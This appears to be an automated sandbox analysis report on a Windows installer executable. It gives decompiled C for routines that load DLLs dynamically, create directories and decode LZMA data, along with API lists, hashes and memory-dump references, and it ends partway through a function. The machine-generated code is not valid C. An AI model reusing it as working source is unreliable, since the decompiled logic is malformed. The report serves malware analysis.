                                            			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                            0x00401f84
                                            0x00401f84
                                            0x00401f89
                                            0x00401f90
                                            0x0040204c
                                            0x00402197
                                            0x00402197
                                            0x004028be
                                            0x004028c1
                                            0x004028cd
                                            0x004028cd
                                            0x00401f9f
                                            0x00401fa9
                                            0x00401fac
                                            0x00401fbb
                                            0x00401fbf
                                            0x00401fc5
                                            0x00401fc9
                                            0x00402045
                                            0x00000000
                                            0x00402045
                                            0x00401fcb
                                            0x00401fd5
                                            0x00401fd9
                                            0x0040201d
                                            0x00401fdb
                                            0x00401fde
                                            0x00401fe1
                                            0x00402011
                                            0x00401fe3
                                            0x00401fe6
                                            0x00401fef
                                            0x00401ff1
                                            0x00401ff1
                                            0x00401fef
                                            0x00401fe1
                                            0x00402025
                                            0x0040203a
                                            0x0040203a
                                            0x00000000
                                            0x00402025
                                            0x00401faf
                                            0x00401fb5
                                            0x00401fb9
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                            • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                            • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                            • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                            0x004015b3
                                            0x004015ba
                                            0x004015bd
                                            0x004015c2
                                            0x004015c6
                                            0x004015c8
                                            0x004015d0
                                            0x004015d2
                                            0x004015d4
                                            0x004015d8
                                            0x004015db
                                            0x004015f3
                                            0x004015f4
                                            0x004015dd
                                            0x004015dd
                                            0x004015e0
                                            0x00000000
                                            0x004015eb
                                            0x004015ec
                                            0x004015ec
                                            0x004015e0
                                            0x004015fb
                                            0x00401602
                                            0x0040160f
                                            0x0040160f
                                            0x00401604
                                            0x00401605
                                            0x0040160d
                                            0x00000000
                                            0x00000000
                                            0x0040160d
                                            0x00401602
                                            0x00401612
                                            0x00401615
                                            0x00401617
                                            0x00401618
                                            0x004015c8
                                            0x0040161f
                                            0x0040164a
                                            0x00402197
                                            0x00401621
                                            0x00401623
                                            0x0040162e
                                            0x00401634
                                            0x0040163c
                                            0x00401642
                                            0x00401642
                                            0x0040163c
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                              • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                              • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                              • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                              • Part of subcall function 00405346: CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                            • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 1892508949-1943935188
                                            • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                            • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                            • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                            • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 99%
                                            			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
